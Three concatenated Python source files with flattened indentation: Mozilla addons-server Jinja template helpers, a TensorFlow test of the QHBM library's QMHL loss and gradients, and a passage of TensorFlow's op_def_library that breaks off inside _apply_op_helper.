return Format(utils.get_locale_from_lang(lang))
@register.filter
def numberfmt(num, format=None):
return _get_format().decimal(num, format)
@register.filter
def currencyfmt(num, currency):
if num is None:
return ''
return _get_format().currency(decimal.Decimal(num), currency)
def page_name(app=None):
"""Determine the correct page name for the given app (or no app)."""
if app:
return ugettext(u'Add-ons for {0}').format(app.pretty)
else:
return ugettext('Add-ons')
@register.function
@jinja2.contextfunction
def page_title(context, title):
title = force_text(title)
base_title = page_name(context['request'].APP)
# The following line doesn't use string formatting because we want to
# preserve the type of `title` in case it's a jinja2 `Markup` (safe,
# escaped) object.
return format_html(u'{} :: {}', title, base_title)
@register.filter
def json(s):
return jsonlib.dumps(s)
@register.filter
def absolutify(url, site=None):
"""Takes a URL and prepends the SITE_URL"""
if url.startswith('http'):
return url
else:
return urljoin(site or settings.SITE_URL, url)
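# Example: absolutify('/en-US/firefox/') yields settings.SITE_URL +
# '/en-US/firefox/', while anything already starting with 'http' is
# returned untouched.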
@register.filter
def strip_controls(s):
"""
Strips control characters from a string.
"""
# Translation table of control characters.
control_trans = dict((n, None) for n in xrange(32) if n not in [10, 13])
rv = unicode(s).translate(control_trans)
return jinja2.Markup(rv) if isinstance(s, jinja2.Markup) else rv
@register.filter
def external_url(url):
"""Bounce a URL off outgoing.prod.mozaws.net."""
return urlresolvers.get_outgoing_url(unicode(url))
@register.filter
def shuffle(sequence):
"""Shuffle a sequence."""
random.shuffle(sequence)
return sequence
@register.function
def license_link(license):
"""Link to a code license, including icon where applicable."""
# If passed in an integer, try to look up the License.
from olympia.versions.models import License
if isinstance(license, (long, int)):
if license in PERSONA_LICENSES_IDS:
# Grab built-in license.
license = PERSONA_LICENSES_IDS[license]
else:
# Grab custom license.
license = License.objects.filter(id=license)
if not license.exists():
return ''
license = license[0]
elif not license:
return ''
if not getattr(license, 'builtin', True):
return ugettext('Custom License')
template = get_env().get_template('amo/license_link.html')
return jinja2.Markup(template.render({'license': license}))
@register.function
def field(field, label=None, **attrs):
if label is not None:
field.label = label
# HTML from Django is already escaped.
return jinja2.Markup(u'%s<p>%s%s</p>' %
(field.errors, field.label_tag(),
field.as_widget(attrs=attrs)))
@register.inclusion_tag('amo/category-arrow.html')
@jinja2.contextfunction
def category_arrow(context, key, prefix):
d = dict(context.items())
d.update(key=key, prefix=prefix)
return d
@register.filter
def timesince(time):
if not time:
return u''
ago = defaultfilters.timesince(time)
# L10n: relative time in the past, like '4 days ago'
return ugettext(u'{0} ago').format(ago)
@register.inclusion_tag('amo/recaptcha.html')
@jinja2.contextfunction
def recaptcha(context, form):
d = dict(context.items())
d.update(form=form)
return d
@register.filter
def is_choice_field(value):
try:
return isinstance(value.field.widget, CheckboxInput)
except AttributeError:
pass
@register.function
@jinja2.contextfunction
def cache_buster(context, url):
if 'BUILD_ID' in context:
build = context['BUILD_ID']
else:
if url.endswith('.js'):
build = context['BUILD_ID_JS']
elif url.endswith('.css'):
build = context['BUILD_ID_CSS']
else:
build = context['BUILD_ID_IMG']
return utils.urlparams(url, b=build)
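# Illustrative example (hypothetical build id values; assumes utils.urlparams
# appends query parameters to the URL):
#   cache_buster(ctx, 'js/app.js')  ->  'js/app.js?b=<BUILD_ID_JS>'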
@register.function
@jinja2.contextfunction
def media(context, url):
"""Get a MEDIA_URL link with a cache buster querystring."""
return urljoin(settings.MEDIA_URL, cache_buster(context, url))
@register.function
@jinja2.contextfunction
def static(context, url):
"""Get a STATIC_URL link with a cache buster querystring."""
return urljoin(settings.STATIC_URL, cache_buster(context, url))
@register.function
@jinja2.evalcontextfunction
def attrs(ctx, *args, **kw):
return jinja2.filters.do_xmlattr(ctx, dict(*args, **kw))
@register.function
@jinja2.contextfunction
def side_nav(context, addon_type, category=None):
app = context['request'].APP.id
cat = str(category.id) if category else 'all'
return caching.cached(lambda: _side_nav(context, addon_type, category),
'side-nav-%s-%s-%s' % (app, addon_type, cat))
def _side_nav(context, addon_type, cat):
# Prevent helpers generating circular imports.
from olympia.addons.models import Category, Addon
request = context['request']
qs = Category.objects.filter(weight__gte=0)
if addon_type != amo.ADDON_PERSONA:
qs = qs.filter(application=request.APP.id)
sort_key = attrgetter('weight', 'name')
categories = sorted(qs.filter(type=addon_type), key=sort_key)
if cat:
base_url = cat.get_url_path()
else:
base_url = Addon.get_type_url(addon_type)
ctx = dict(request=request, base_url=base_url, categories=categories,
addon_type=addon_type, amo=amo)
template = get_env().get_template('amo/side_nav.html')
return jinja2.Markup(template.render(ctx))
@register.function
@jinja2.contextfunction
def site_nav(context):
app = context['request'].APP.id
return caching.cached(lambda: _site_nav(context), 'site-nav-%s' % app)
def _site_nav(context):
# Prevent helpers from generating circular imports.
from olympia.addons.models import Category
request = context['request']
def sorted_cats(qs):
return sorted(qs, key=attrgetter('weight', 'name'))
extensions = Category.objects.filter(
application=request.APP.id, weight__gte=0, type=amo.ADDON_EXTENSION)
personas = Category.objects.filter(weight__gte=0, type=amo.ADDON_PERSONA)
ctx = dict(request=request, amo=amo,
extensions=sorted_cats(extensions),
personas=sorted_cats(personas))
template = get_env().get_template('amo/site_nav.html')
return jinja2.Markup(template.render(ctx))
@register.function
def loc(s):
"""A noop function for strings that are not ready to be localized."""
return trim_whitespace(s)
@register.function
def site_event_type(type):
return amo.SITE_EVENT_CHOICES[type]
@register.function
@jinja2.contextfunction
def remora_url(context, url, lang=None, app=None, prefix=''):
"""Wrapper for urlresolvers.remora_url"""
if lang is None:
_lang = context['LANG']
if _lang:
lang = to_locale(_lang).replace('_', '-')
if app is None:
try:
app = context['APP'].short
except (AttributeError, KeyError):
pass
return urlresolvers.remora_url(url=url, lang=lang, app=app, prefix=prefix)
@register.function
@jinja2.contextfunction
def hasOneToOne(context, obj, attr):
try:
getattr(obj, attr)
return True
except ObjectDoesNotExist:
return False
@register.function
def no_results_amo():
# This prints a "No results found" message. That's all. Carry on.
t = get_env().get_template('amo/no_results.html').render()
return jinja2.Markup(t)
def _relative_to_absolute(url):
"""
Prefixes relative URLs with STATIC_URL so that they can be inlined.
This function is intended to be used as the ``repl`` argument of
``re.sub``.
"""
url = url.group(1).strip('"\'')
if not url.startswith(('data:', 'http:', 'https:', '//')):
url = url.replace('../../', settings.STATIC_URL)
return 'url(%s)' % url
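# Illustrative use as the ``repl`` argument of ``re.sub`` (mirrors the call in
# inline_css below):
#   re.sub(r'url\(([^)]*?)\)', _relative_to_absolute, 'url("../../img/x.png")')
#   ->  'url(%simg/x.png)' % settings.STATIC_URL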
@register.function
def inline_css(bundle, media=False, debug=None):
"""
If we are in debug mode, just output a single style tag for each css file.
If we are not in debug mode, return a style tag that inlines the contents of bundle-min.css.
Forces a regular css() call for external URLs (no inline allowed).
Extracted from jingo-minify and re-registered, see:
https://github.com/jsocol/jingo-minify/pull/41
Added: turns relative links into absolute ones using STATIC_URL.
"""
if debug is None:
debug = getattr(settings, 'DEBUG', False)
if debug:
items = [_get_compiled_css_url(i)
for i in settings.MINIFY_BUNDLES['css'][bundle]]
else:
items = ['css/%s-min.css' % bundle]
if not media:
media = getattr(settings, 'CSS_MEDIA_DEFAULT', 'screen,projection,tv')
contents = []
for css in items:
if is_external(css):
return _build_html([css], '<link rel="stylesheet" media="%s" '
'href="%%s" />' % media)
with open(get_path(css), 'r') as f:
css_content = f.read()
css_parsed = re.sub(r'url\(([^)]*?)\)',
_relative_to_absolute,
css_content)
contents.append(css_parsed)
return _build_html(contents, '<style type="text/css" media="%s">%%s'
'</style>' % media)
# A (temporary?) copy of this is in services/utils.py. See bug 1055654.
def user_media_path(what):
"""Make it possible to override storage paths in settings.
By default, all storage paths are in the MEDIA_ROOT.
This is backwards compatible.
"""
default = os.path.join(settings.MEDIA_ROOT, what)
key = "{0}_PATH".format(what.upper())
return getattr(settings, key, default)
# A (temporary?) copy of this is in services/utils.py. See bug 1055654.
def user_media_url(what):
"""
Generate the default media URL, and make it possible to override it from
settings.
"""
default = '%s%s/' % (settings.MEDIA_URL, what)
key = "{0}_URL".format(what.upper().replace('-', '_'))
return getattr(settings, key, default)
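# Example of the key derivation above: user_media_url('addon-icons') checks
# settings.ADDON_ICONS_URL (via .upper().replace('-', '_')) and falls back to
# MEDIA_URL + 'addon-icons/'.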
def id_to_path(pk):
"""
Generate a path from an id, to distribute folders in the file system.
1 => 1/1/1
12 => 2/12/12
123456 => 6/56/123456
"""
pk = unicode(pk)
path = [pk[-1]]
if len(pk) >= 2:
path.append(pk[-2:])
else:
path.append(pk)
path.append(pk)
return os.path.join(*path)
@register.filter
def hidden_field(field):
return field.as_widget(attrs={'style': 'display:none'})
|
|
# Copyright 2021 The QHBM Library Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for qhbmlib.inference.qmhl_loss"""
import functools
import math
import cirq
import sympy
import tensorflow as tf
import tensorflow_probability as tfp
from qhbmlib import data
from qhbmlib import inference
from qhbmlib import models
from tests import test_util
class QMHLTest(tf.test.TestCase):
"""Tests for the QMHL loss and gradients."""
def setUp(self):
"""Initializes test objects."""
super().setUp()
self.num_qubits_list = [1, 2]
self.tf_random_seed = 4
self.tf_random_seed_alt = 6
self.tfp_seed = tf.constant([3, 6], tf.int32)
# TODO(#190)
self.num_samples = int(1e6)
self.close_rtol = 2e-2
self.zero_atol = 2e-3
self.not_zero_atol = 2e-3
@test_util.eager_mode_toggle
def test_self_qmhl(self):
"""Confirms known value of the QMHL loss of a model against itself."""
num_layers = 1
qmhl_wrapper = tf.function(inference.qmhl)
for num_qubits in self.num_qubits_list:
qubits = cirq.GridQubit.rect(1, num_qubits)
data_h, data_infer = test_util.get_random_hamiltonian_and_inference(
qubits, num_layers, f"data_objects_{num_qubits}", self.num_samples)
model_h, model_infer = test_util.get_random_hamiltonian_and_inference(
qubits,
num_layers,
f"hamiltonian_objects_{num_qubits}",
self.num_samples,
initializer_seed=self.tf_random_seed)
# Set data equal to the model
data_h.set_weights(model_h.get_weights())
actual_data = data.QHBMData(data_infer)
# Trained loss is the entropy.
expected_loss = model_infer.e_inference.entropy()
# Since this is the optimum, derivatives should all be zero.
expected_loss_derivative = [
tf.zeros_like(v) for v in model_h.trainable_variables
]
with tf.GradientTape() as tape:
actual_loss = qmhl_wrapper(actual_data, model_infer)
actual_loss_derivative = tape.gradient(actual_loss,
model_h.trainable_variables)
self.assertAllClose(actual_loss, expected_loss, rtol=self.close_rtol)
self.assertAllClose(
actual_loss_derivative, expected_loss_derivative, atol=self.zero_atol)
@test_util.eager_mode_toggle
def test_hamiltonian_qmhl(self):
"""Tests derivatives of QMHL with respect to the model."""
# TODO(#171): Delta function seems generalizable.
def delta_qmhl(k, var, actual_data, model_qhbm, delta):
"""Calculates the qmhl loss with the kth entry of `var` perturbed."""
num_elts = tf.size(var)
old_value = var.read_value()
var.assign(old_value + delta * tf.one_hot(k, num_elts, 1.0, 0.0))
delta_loss = inference.qmhl(actual_data, model_qhbm)
var.assign(old_value)
return delta_loss
qmhl_wrapper = tf.function(inference.qmhl)
def qmhl_derivative(variables_list, actual_data, model_qhbm):
"""Approximately differentiates QMHL wih respect to the inputs."""
derivatives = []
for var in variables_list:
var_derivative_list = []
num_elts = tf.size(var) # Assumes variable is 1D
for n in range(num_elts):
this_derivative = test_util.approximate_derivative(
functools.partial(delta_qmhl, n, var, actual_data, model_qhbm))
var_derivative_list.append(this_derivative.numpy())
derivatives.append(tf.constant(var_derivative_list))
return derivatives
for num_qubits in self.num_qubits_list:
qubits = cirq.GridQubit.rect(1, num_qubits)
num_layers = 2
_, data_qhbm = test_util.get_random_hamiltonian_and_inference(
qubits,
num_layers,
f"data_objects_{num_qubits}",
self.num_samples,
initializer_seed=self.tf_random_seed,
ebm_seed=self.tfp_seed)
actual_data = data.QHBMData(data_qhbm)
model_h, model_qhbm = test_util.get_random_hamiltonian_and_inference(
qubits,
num_layers,
f"model_objects_{num_qubits}",
self.num_samples,
initializer_seed=self.tf_random_seed_alt,
ebm_seed=self.tfp_seed)
# Make sure variables are trainable
self.assertGreater(len(model_h.trainable_variables), 1)
with tf.GradientTape() as tape:
actual_loss = qmhl_wrapper(actual_data, model_qhbm)
actual_derivative = tape.gradient(actual_loss,
model_h.trainable_variables)
expected_derivative = qmhl_derivative(model_h.trainable_variables,
actual_data, model_qhbm)
# Changing model parameters is working if finite difference derivatives
# are non-zero. Also confirms that model_h and data_h are different.
tf.nest.map_structure(
lambda x: self.assertAllGreater(tf.abs(x), self.not_zero_atol),
expected_derivative)
self.assertAllClose(
actual_derivative, expected_derivative, rtol=self.close_rtol)
def test_loss_value_x_rot(self):
"""Confirms correct values for a single qubit X rotation QHBM.
We use a data state which is a Y rotation of an initially diagonal density
operator. The QHBM is a Bernoulli latent state with X rotation QNN.
See the colab notebook at the following link for derivations:
https://colab.research.google.com/drive/14987JCMju_8AVvvVoojwe6hA7Nlw-Dhe?usp=sharing
Since each qubit is independent, the loss is the sum over the individual
qubit losses, and the gradients are the per-qubit gradients.
"""
ebm_const = 1.0
q_const = math.pi
for num_qubits in self.num_qubits_list:
# EBM
ebm_init = tf.keras.initializers.RandomUniform(
minval=ebm_const / 4, maxval=ebm_const, seed=self.tf_random_seed)
actual_energy = models.BernoulliEnergy(list(range(num_qubits)), ebm_init)
e_infer = inference.BernoulliEnergyInference(
actual_energy, self.num_samples, initial_seed=self.tfp_seed)
# QNN
qubits = cirq.GridQubit.rect(1, num_qubits)
r_symbols = [sympy.Symbol(f"phi_{n}") for n in range(num_qubits)]
r_circuit = cirq.Circuit(
cirq.rx(r_s)(q) for r_s, q in zip(r_symbols, qubits))
qnn_init = tf.keras.initializers.RandomUniform(
minval=q_const / 4, maxval=q_const, seed=self.tf_random_seed)
actual_circuit = models.DirectQuantumCircuit(r_circuit, qnn_init)
q_infer = inference.QuantumInference(actual_circuit)
qhbm_infer = inference.QHBM(e_infer, q_infer)
model = qhbm_infer.modular_hamiltonian
# Confirm quantities computed from the QHBM model
test_thetas = model.energy.trainable_variables[0]
test_phis = model.circuit.trainable_variables[0]
with tf.GradientTape() as log_partition_tape:
actual_log_partition = qhbm_infer.e_inference.log_partition()
expected_log_partition = tf.reduce_sum(
tf.math.log(2 * tf.math.cosh(test_thetas)))
self.assertAllClose(
actual_log_partition, expected_log_partition, rtol=self.close_rtol)
# Confirm the model's modular Hamiltonian for the 1 qubit case
if num_qubits == 1:
actual_dm = inference.density_matrix(model)
actual_log_dm = tf.linalg.logm(actual_dm)
actual_ktp = -actual_log_dm - tf.eye(
2, dtype=tf.complex64) * tf.cast(actual_log_partition, tf.complex64)
a = (test_thetas[0] * tf.math.cos(test_phis[0])).numpy() + 0j
b = 1j * (test_thetas[0] * tf.math.sin(test_phis[0])).numpy()
c = -1j * (test_thetas[0] * tf.math.sin(test_phis[0])).numpy()
d = -(test_thetas[0] * tf.math.cos(test_phis[0])).numpy() + 0j
expected_ktp = tf.constant([[a, b], [c, d]], dtype=tf.complex64)
self.assertAllClose(actual_ktp, expected_ktp, rtol=self.close_rtol)
# Build target data
alphas = tf.random.uniform([num_qubits], -q_const, q_const, tf.float32,
self.tf_random_seed)
y_rot = cirq.Circuit(
cirq.ry(r.numpy())(q) for r, q in zip(alphas, qubits))
data_circuit = models.DirectQuantumCircuit(y_rot)
data_q_infer = inference.QuantumInference(data_circuit)
data_probs = tf.random.uniform([num_qubits],
dtype=tf.float32,
seed=self.tf_random_seed)
data_samples = tfp.distributions.Bernoulli(
probs=1 - data_probs, dtype=tf.int8).sample(
self.num_samples, seed=self.tfp_seed)
# Load target data into a QuantumData class
class FixedData(data.QuantumData):
"""Contains a fixed quantum data set."""
def __init__(self, samples, q_infer):
"""Initializes a FixedData."""
self.samples = samples
self.q_infer = q_infer
def expectation(self, observable):
"""Averages over the fixed quantum data set."""
raw_expectations = self.q_infer.expectation(self.samples, observable)
return tf.math.reduce_mean(raw_expectations)
actual_data = FixedData(data_samples, data_q_infer)
qmhl_wrapper = tf.function(inference.qmhl)
with tf.GradientTape() as loss_tape:
actual_loss = qmhl_wrapper(actual_data, qhbm_infer)
# TODO(zaqqwerty): add way to use a log QHBM as observable on states
expected_expectation = tf.reduce_sum(test_thetas * (2 * data_probs - 1) *
tf.math.cos(alphas) *
tf.math.cos(test_phis))
with tf.GradientTape() as expectation_tape:
actual_expectation = actual_data.expectation(
qhbm_infer.modular_hamiltonian)
self.assertAllClose(actual_expectation, expected_expectation,
self.close_rtol)
expected_loss = expected_expectation + expected_log_partition
self.assertAllClose(actual_loss, expected_loss, rtol=self.close_rtol)
expected_log_partition_grad = tf.math.tanh(test_thetas)
actual_log_partition_grad = log_partition_tape.gradient(
actual_log_partition, test_thetas)
self.assertAllClose(
actual_log_partition_grad,
expected_log_partition_grad,
rtol=self.close_rtol)
expected_expectation_thetas_grad = (
2 * data_probs - 1) * tf.math.cos(alphas) * tf.math.cos(test_phis)
expected_expectation_phis_grad = -test_thetas * (
2 * data_probs - 1) * tf.math.cos(alphas) * tf.math.sin(test_phis)
(actual_expectation_thetas_grad,
actual_expectation_phis_grad) = expectation_tape.gradient(
actual_expectation, (test_thetas, test_phis))
self.assertAllClose(
actual_expectation_thetas_grad,
expected_expectation_thetas_grad,
rtol=self.close_rtol)
self.assertAllClose(
actual_expectation_phis_grad,
expected_expectation_phis_grad,
rtol=self.close_rtol)
actual_thetas_grads, actual_phis_grads = loss_tape.gradient(
actual_loss, (test_thetas, test_phis))
expected_thetas_grads = (
expected_expectation_thetas_grad + expected_log_partition_grad)
expected_phis_grads = expected_expectation_phis_grad
self.assertAllClose(
actual_thetas_grads, expected_thetas_grads, rtol=self.close_rtol)
self.assertAllClose(
actual_phis_grads, expected_phis_grads, rtol=self.close_rtol)
if __name__ == "__main__":
print("Running qmhl_loss_test.py ...")
tf.test.main()
|
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Class to hold a library of OpDefs and use it to create Brain operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import six
from tensorflow.core.framework import attr_value_pb2
from tensorflow.core.framework import tensor_pb2
from tensorflow.core.framework import tensor_shape_pb2
from tensorflow.core.framework import types_pb2
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import op_callbacks
from tensorflow.python.framework import op_def_registry
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import compat
from tensorflow.python.util import tf_contextlib
def _Attr(op_def, name):
for attr in op_def.attr:
if attr.name == name:
return attr
raise TypeError("Inconsistent OpDef for '%s', missing attr '%s'" %
(op_def.name, name))
def _AttrValue(attr_protos, name):
if name in attr_protos:
return attr_protos[name]
raise TypeError("Inconsistent OpDef, missing attr '%s' from '%s'." %
(name, attr_protos))
def _SatisfiesTypeConstraint(dtype, attr_def, param_name):
if attr_def.HasField("allowed_values"):
allowed_list = attr_def.allowed_values.list.type
if dtype not in allowed_list:
raise TypeError(
"Value passed to parameter '%s' has DataType %s not in list of "
"allowed values: %s" %
(param_name, dtypes.as_dtype(dtype).name,
", ".join(dtypes.as_dtype(x).name for x in allowed_list)))
def _IsListParameter(arg):
if arg.number_attr:
return True
elif arg.type_list_attr:
return True
return False
def _NumTypeFields(arg):
num = 0
if arg.type != types_pb2.DT_INVALID: num += 1
if arg.type_attr: num += 1
if arg.type_list_attr: num += 1
return num
def _IsListValue(v):
return isinstance(v, (list, tuple))
def _Flatten(l):
"""Converts [1, 2, [3, 4], [5]] to [1, 2, 3, 4, 5]."""
# [1, 2, [3, 4], [5]] -> [[1], [2], [3, 4], [5]]
l_of_l = [x if _IsListValue(x) else [x] for x in l]
# [[1], [2], [3, 4], [5]] -> [1, 2, 3, 4, 5]
return [item for sublist in l_of_l for item in sublist]
def _Restructure(l, structure):
"""Returns the elements of list l structured according to the given structure.
A structure is represented by a list whose elements are either
`None` or a non-negative integer. `None` corresponds to a single
element in the output list, and an integer N corresponds to a nested
list of length N.
The function returns a data structure whose shape is given by
`structure`, and whose elements are taken from `l`. If `structure`
is a singleton, the function returns the single data structure
implied by the 0th element of `structure`. For example:
_Restructure(["foo", "bar", "baz", "qux"], [None, 2, None])
-> ["foo", ["bar", "baz"], "qux"]
_Restructure(["foo"], [None]) -> "foo"
_Restructure(["foo"], [1]) -> ["foo"]
_Restructure([], [0]) -> []
Args:
l: A list.
structure: A list whose elements are either `None` or a non-negative
integer.
Returns:
The elements of `l`, restructured according to `structure`. If
`structure` is a list of length 1, this function returns the
single data structure implied by `structure[0]`.
"""
result = []
current_index = 0
for element in structure:
if element is None:
result.append(l[current_index])
current_index += 1
else:
result.append(l[current_index:current_index+element])
current_index += element
if len(result) == 1:
return result[0]
else:
return tuple(result)
def _MakeFloat(v, arg_name):
if not isinstance(v, compat.real_types):
raise TypeError("Expected float for argument '%s' not %s." %
(arg_name, repr(v)))
return float(v)
def _MakeInt(v, arg_name):
if isinstance(v, six.string_types):
raise TypeError("Expected int for argument '%s' not %s." %
(arg_name, repr(v)))
try:
return int(v)
except (ValueError, TypeError):
raise TypeError("Expected int for argument '%s' not %s." %
(arg_name, repr(v)))
def _MakeStr(v, arg_name):
if not isinstance(v, compat.bytes_or_text_types):
raise TypeError("Expected string for argument '%s' not %s." %
(arg_name, repr(v)))
return compat.as_bytes(v) # Convert unicode strings to bytes.
def _MakeBool(v, arg_name):
if not isinstance(v, bool):
raise TypeError("Expected bool for argument '%s' not %s." %
(arg_name, repr(v)))
return v
def _MakeType(v, attr_def):
try:
v = dtypes.as_dtype(v).base_dtype
except TypeError:
raise TypeError("Expected DataType for argument '%s' not %s." %
(attr_def.name, repr(v)))
i = v.as_datatype_enum
_SatisfiesTypeConstraint(i, attr_def, param_name=attr_def.name)
return i
def _MakeShape(v, arg_name):
"""Convert v into a TensorShapeProto."""
# Args:
# v: A TensorShapeProto, a list of ints, or a tensor_shape.TensorShape.
# arg_name: String, for error messages.
# Returns:
# A TensorShapeProto.
if isinstance(v, tensor_shape_pb2.TensorShapeProto):
for d in v.dim:
if d.name:
logging.warning("Warning: TensorShapeProto with a named dimension: %s",
str(v))
break
return v
try:
return tensor_shape.as_shape(v).as_proto()
except TypeError as e:
raise TypeError("Error converting %s to a TensorShape: %s" % (arg_name, e))
except ValueError as e:
raise ValueError("Error converting %s to a TensorShape: %s" % (arg_name, e))
def _MakeTensor(v, arg_name):
"""Ensure v is a TensorProto."""
if isinstance(v, tensor_pb2.TensorProto):
return v
raise TypeError(
"Don't know how to convert %s to a TensorProto for argument '%s'" %
(repr(v), arg_name))
def _MakeFunc(v, arg_name):
"""Ensure v is a func."""
if isinstance(v, attr_value_pb2.NameAttrList):
return v
if isinstance(v, compat.bytes_or_text_types):
fn_attr = attr_value_pb2.NameAttrList(name=v)
elif hasattr(v, "add_to_graph"):
v.add_to_graph(ops.get_default_graph())
if hasattr(v, "_as_name_attr_list"):
fn_attr = v._as_name_attr_list # pylint: disable=protected-access
else:
fn_attr = attr_value_pb2.NameAttrList(name=v.name)
else:
raise TypeError("Don't know how to convert {} to a func for "
"argument {}".format(v, arg_name))
return fn_attr
# pylint: disable=g-doc-return-or-yield
@tf_contextlib.contextmanager
def _MaybeColocateWith(inputs):
"""A context manager for (maybe) colocating with a list of input tensors.
Args:
inputs: A list of `Tensor` or `Operation` objects.
Returns:
A context manager.
"""
if not inputs:
yield
else:
# NOTE(mrry): The `ops.colocate_with()` function accepts only a single
# op or tensor, so we create one context manager per element in the list.
with ops.colocate_with(inputs[0]), _MaybeColocateWith(inputs[1:]):
yield
# pylint: enable=g-doc-return-or-yield
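# Illustrative expansion (hypothetical tensors a and b): _MaybeColocateWith([a, b])
# behaves like the nested form
#   with ops.colocate_with(a):
#       with ops.colocate_with(b):
#           yield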
def apply_op(op_type_name, name=None, **keywords): # pylint: disable=invalid-name
"""Add a node invoking a registered Op to a graph.
Example usage:
# input1 and input2 can be Tensors or anything ops.convert_to_tensor()
# will convert to a Tensor.
op_def_library.apply_op("op", input1=input1, input2=input2)
# Can specify a node name.
op_def_library.apply_op("op", input1=input1, name="node_name")
# Must use keyword arguments, with the names specified in the OpDef.
op_def_library.apply_op("op", input_name=input, attr_name=attr)
All attrs must either be inferred from an input or specified.
(If inferred, the attr must not be specified.) If an attr has a default
value specified in the Op's OpDef, then you may pass None as the value
of that attr to get the default.
Args:
op_type_name: string. Must match the name field of a registered Op.
name: string. Optional name of the created op.
**keywords: input Tensor and attr arguments specified by name,
and optional parameters to pass when constructing the Operation.
Returns:
The Tensor(s) representing the output of the operation, or the Operation
itself if there are no outputs.
Raises:
RuntimeError: On some errors.
TypeError: On some errors.
ValueError: On some errors.
"""
output_structure, is_stateful, op, outputs = _apply_op_helper(
op_type_name, name, **keywords)
if output_structure:
res = _Restructure(ops.convert_n_to_tensor(outputs), output_structure)
if isinstance(res, list) and not res and is_stateful:
return op
else:
return res
else:
return op
def _apply_op_helper(op_type_name, name=None, **keywords): # pylint: disable=invalid-name
"""Implementation of apply_op that returns output_structure, op."""
op_def = op_def_registry.get(op_type_name)
if op_def is None:
raise RuntimeError("Unrecognized Op name " + op_type_name)
# Determine the graph context.
try:
# Need to flatten all the arguments into a list.
# pylint: disable=protected-access
g = ops._get_graph_from_inputs(_Flatten(keywords.values()))
# pylint: enable=protected-access
except AssertionError as e:
raise RuntimeError(
"Cannot determine graph for Op '%s' due to: %s"
% (op_type_name, e))
# Default name if not specified.
if name is None:
name = op_type_name
# Check for deprecation
deprecation_version = op_def.deprecation.version
if deprecation_version:
producer = g.graph_def_versions.producer
if producer >= deprecation_version:
raise NotImplementedError(
("Op %s is not available in GraphDef version %d. "
"It has been removed in version %d. %s.") %
(op_type_name, producer, deprecation_version,
op_def.deprecation.explanation))
# Fill in the list of default types for all "type" attrs. This
# will be used to choose a preferred dtype to convert to in the
# absence of input type information.
#
# TODO(b/31302892): Currently the defaults don't work in the right
# way if you have two inputs, one of whose type resolution depends
# on the other. Handling this will require restructuring this code
# significantly.
default_type_attr_map = {}
for attr_def in op_def.attr:
if attr_def.type != "type":
continue
key = attr_def.name
if attr_def.HasField("default_value"):
default_type_attr_map[key] = dtypes.as_dtype(
attr_def.default_value.type)
# Requires that op_def has passed validation (using the C++
# ValidateOpDef() from ../framework/op_def_util.h).
attrs = {}
inputs = []
input_types = []
with g.as_default(), ops.name_scope(name) as scope:
# Perform input type inference
inferred_from = {}
for input_arg in op_def.input_arg:
input_name = input_arg.name
if input_name in keywords:
values = keywords.pop(input_name)
elif input_name + "_" in keywords:
# Handle the case where the name is a keyword or built-in
# for Python so we use the name + _ instead.
input_name += "_"
values = keywords.pop(input_name)
else:
raise TypeError("No argument for input " + input_name)
# Goals:
# * Convert values to Tensors if it contains constants.
# * Verify that values is a list if that matches the input_arg's
# type.
# * If the input_arg's type is determined by attrs, either set
# those attrs and validate those attr values are legal (if
# they have not yet been set) or validate the input matches
# the type indicated by the attrs (if they have already been
# inferred via an earlier input).
# * If the input_arg has an explicit type, make sure the input
# conforms.
if _IsListParameter(input_arg):
if not _IsListValue(values):
raise TypeError(
"Expected list for '%s' argument to '%s' Op, not %s." %
(input_name, op_type_name, values))
# In cases where we expect all elements of the list to have the
# same dtype, try to cast non-Tensor elements to that type.
dtype = None
default_dtype = None
if input_arg.type != types_pb2.DT_INVALID:
dtype = input_arg.type
elif input_arg.number_attr:
if input_arg.type_attr in attrs:
dtype = attrs[input_arg.type_attr]
else:
for t in values:
if isinstance(t, ops.Tensor):
dtype = t.dtype
break
# dtype still not found, prefer using the default dtype
# from the attr.
if dtype is None and input_arg.type_attr in default_type_attr_map:
default_dtype = default_type_attr_map[input_arg.type_attr]
try:
if not input_arg.is_ref and dtype:
dtype = dtypes.as_dtype(dtype).base_dtype
values = ops.internal_convert_n_to_tensor(
values,
name=input_arg.name,
dtype=dtype if dtype else None,
preferred_dtype=default_dtype,
as_ref=input_arg.is_ref)
if input_arg.number_attr and len(
set(v.dtype.base_dtype for v in values)) > 1:
raise TypeError() # All types should match.
except (TypeError, ValueError):
# What types does the conversion function think values have?
observed_types = []
for value in values:
try:
converted_value = ops.convert_to_tensor(
value, as_ref=input_arg.is_ref)
observed_types.append(converted_value.dtype.base_dtype.name)
except (TypeError, ValueError):
observed_types.append("<NOT CONVERTIBLE TO TENSOR>")
observed = ", ".join(observed_types)
prefix = (
"Tensors in list passed to '%s' of '%s' Op have types [%s]" %
(input_name, op_type_name, observed))
if input_arg.number_attr:
if input_arg.type != types_pb2.DT_INVALID:
raise TypeError("%s that do not match expected type %s." %
(prefix, dtype.name))
elif input_arg.type_attr in attrs:
raise TypeError("%s that do not match type %s inferred from "
"earlier arguments." %
(prefix, dtype.name))
else:
raise TypeError("%s that don't all match." % prefix)
else:
raise TypeError(
"%s that are invalid. Tensors: %s" % (prefix, values))
types = [x.dtype for x in values]
inputs.extend(values)
else:
# In cases where we have an expected type, try to convert non-Tensor
# arguments to that type.
dtype = None
default_dtype = None
if input_arg.type != types_pb2.DT_INVALID:
dtype = input_arg.type
elif input_arg.type_attr in attrs:
dtype = attrs[input_arg.type_attr]
